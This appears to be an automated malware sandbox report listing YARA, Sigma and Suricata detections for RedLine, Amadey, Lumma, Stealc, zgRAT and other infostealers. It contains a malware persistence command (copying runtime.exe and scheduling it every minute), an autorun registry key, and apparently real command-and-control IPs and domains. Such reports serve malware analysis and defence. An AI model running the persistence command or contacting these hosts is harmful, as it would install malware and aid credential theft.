9.2.crypted.exe.3f75570.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.RegAsm.exe.436060.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
15.0.CZjRdKVnFB.exe.a10000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.0.CZjRdKVnFB.exe.a10000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.0.CZjRdKVnFB.exe.a10000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.2.RegAsm.exe.436060.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
30.2.runtime.exe.1cde0324.8.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
28.0.build.exe.be0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
28.0.build.exe.be0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
28.0.build.exe.be0000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x58137:$s1: file:/// 0x5806f:$s2: {11111-22222-10009-11112} 0x580c7:$s3: {11111-22222-50001-00000} 0x54b4c:$s4: get_Module 0x4e8e2:$s5: Reverse 0x4f6bc:$s6: BlockCopy 0x4e7bb:$s7: ReadByte 0x58149:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
21.2.Hkbsse.exe.620000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
30.2.runtime.exe.1cde0000.7.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.0.Hkbsse.exe.620000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.800000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
40.2.crypted.exe.41a5570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.RegAsm.exe.482060.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.2.RegAsm.exe.482060.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.RegAsm.exe.482060.1.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x43893:$s1: file:/// 0x437ef:$s2: {11111-22222-10009-11112} 0x43823:$s3: {11111-22222-50001-00000} 0x4084e:$s4: get_Module 0x3af3c:$s5: Reverse 0x3bc37:$s6: BlockCopy 0x3af0a:$s7: ReadByte 0x438a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
7.2.axplong.exe.1b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
14.2.RegAsm.exe.400000.2.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.2.RegAsm.exe.400000.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.RegAsm.exe.400000.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.RegAsm.exe.400000.2.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xc48f3:$s1: file:/// 0xc484f:$s2: {11111-22222-10009-11112} 0xc4883:$s3: {11111-22222-50001-00000} 0xc18ae:$s4: get_Module 0x52fe2:$s5: Reverse 0xbbf9c:$s5: Reverse 0xbcc97:$s6: BlockCopy 0xbbf6a:$s7: ReadByte 0xc4905:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
19.2.Nework.exe.470000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
31.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
30.2.runtime.exe.1cde0324.8.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
30.2.runtime.exe.1261f87c.5.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
31.2.AppLaunch.exe.400000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
37.2.BitLockerToGo.exe.550000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
21.0.Hkbsse.exe.620000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.crypted.exe.3f75570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
30.2.runtime.exe.1261f558.3.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
19.0.Nework.exe.470000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
14.2.RegAsm.exe.482060.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.2.RegAsm.exe.482060.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.RegAsm.exe.482060.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.rHCHrI9F0v.exe.4a0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
43.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.axplong.exe.1b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
30.2.runtime.exe.1261f87c.5.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
30.2.runtime.exe.1261f558.3.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
30.2.runtime.exe.125a1b20.4.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
25.0.svchost015.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
25.0.svchost015.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 42 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\1000238002\Amadeus.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 3212, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Amadeus.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\user\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F, CommandLine: "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\user\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe, ParentProcessId: 3628, ParentProcessName: runtime.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\user\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F, ProcessId: 5616, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:20.004053+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:24.624655+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:31.349309+0200
SID:	2803304
Severity:	3
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:50.165805+0200
SID:	2044696
Severity:	1
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:19.779361+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:19.359563+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:38.144541+0200
SID:	2044246
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:07.068317+0200
SID:	2044597
Severity:	1
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.16 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:04.391758+0200
SID:	2856122
Severity:	1
Source Port:	80
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 91.202.233.158 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:37.912517+0200
SID:	2044245
Severity:	1
Source Port:	80
Destination Port:	49751
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:25.595652+0200
SID:	2803304
Severity:	3
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:14.714914+0200
SID:	2803305
Severity:	3
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:52.333567+0200
SID:	2044696
Severity:	1
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:14.025227+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:14:24.626398+0200
SID:	2043231
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:36.916046+0200
SID:	2055489
Severity:	1
Source Port:	49852
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:47.381492+0200
SID:	2044696
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:19.512267+0200
SID:	2803304
Severity:	3
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:27.864791+0200
SID:	2803304
Severity:	3
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 52.212.52.84

Timestamp:	2024-09-03T17:13:48.085866+0200
SID:	2803305
Severity:	3
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 95.179.250.45 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:14.030291+0200
SID:	2046056
Severity:	1
Source Port:	26212
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:15.162627+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:12:11.450558+0200
SID:	2043231
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.8 - Destination IP: 188.114.97.3

Timestamp:	2024-09-03T17:14:02.563308+0200
SID:	2049836
Severity:	1
Source Port:	49788
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.8 - Destination IP: 188.114.97.3

Timestamp:	2024-09-03T17:14:02.563308+0200
SID:	2054653
Severity:	1
Source Port:	49788
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:21.998528+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 91.202.233.158 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:38.155125+0200
SID:	2044247
Severity:	1
Source Port:	80
Destination Port:	49751
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:22.729846+0200
SID:	2055489
Severity:	1
Source Port:	49841
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:13:57.022617+0200
SID:	2044597
Severity:	1
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:13.627302+0200
SID:	2044597
Severity:	1
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 65.21.18.51 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:13.166755+0200
SID:	2043234
Severity:	1
Source Port:	45580
Destination Port:	49722
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:14:13.205044+0200
SID:	2043231
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:14:13.205044+0200
SID:	2046045
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 65.21.18.51 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:14:13.431001+0200
SID:	2043234
Severity:	1
Source Port:	45580
Destination Port:	49816
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 185.215.113.17 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:17.828335+0200
SID:	2044245
Severity:	1
Source Port:	80
Destination Port:	49726
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:25.107366+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:23.694054+0200
SID:	2044597
Severity:	1
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:18.317412+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 52.212.52.84

Timestamp:	2024-09-03T17:13:26.708215+0200
SID:	2803305
Severity:	3
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:20.150220+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:50.423527+0200
SID:	2803305
Severity:	3
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:16.583875+0200
SID:	2044597
Severity:	1
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:14.935679+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:16.233819+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:19.959994+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:22.685429+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 52.212.52.84

Timestamp:	2024-09-03T17:13:05.130606+0200
SID:	2803305
Severity:	3
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop) - Source IP: 192.168.2.8 - Destination IP: 1.1.1.1

Timestamp:	2024-09-03T17:14:00.909905+0200
SID:	2055480
Severity:	1
Source Port:	62967
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 176.9.8.206

Timestamp:	2024-09-03T17:14:06.106058+0200
SID:	2803305
Severity:	3
Source Port:	49798
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:08.410750+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:08.410750+0200
SID:	2046045
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:24.401213+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:20.291700+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (millyscroqwp .shop) - Source IP: 192.168.2.8 - Destination IP: 188.114.97.3

Timestamp:	2024-09-03T17:14:35.678210+0200
SID:	2055490
Severity:	1
Source Port:	49851
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:17.070132+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:15.570789+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:23.081293+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 103.130.147.211

Timestamp:	2024-09-03T17:13:56.472805+0200
SID:	2803305
Severity:	3
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:19.280283+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:19.159086+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:19.051519+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:22.453138+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:14:18.977555+0200
SID:	2043231
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:04.991480+0200
SID:	2049836
Severity:	1
Source Port:	49794
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:04.991480+0200
SID:	2054653
Severity:	1
Source Port:	49794
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 - Source IP: 192.168.2.8 - Destination IP: 195.133.48.136

Timestamp:	2024-09-03T17:13:53.632054+0200
SID:	2054350
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:21.773602+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:17.066811+0200
SID:	2044696
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:16.522593+0200
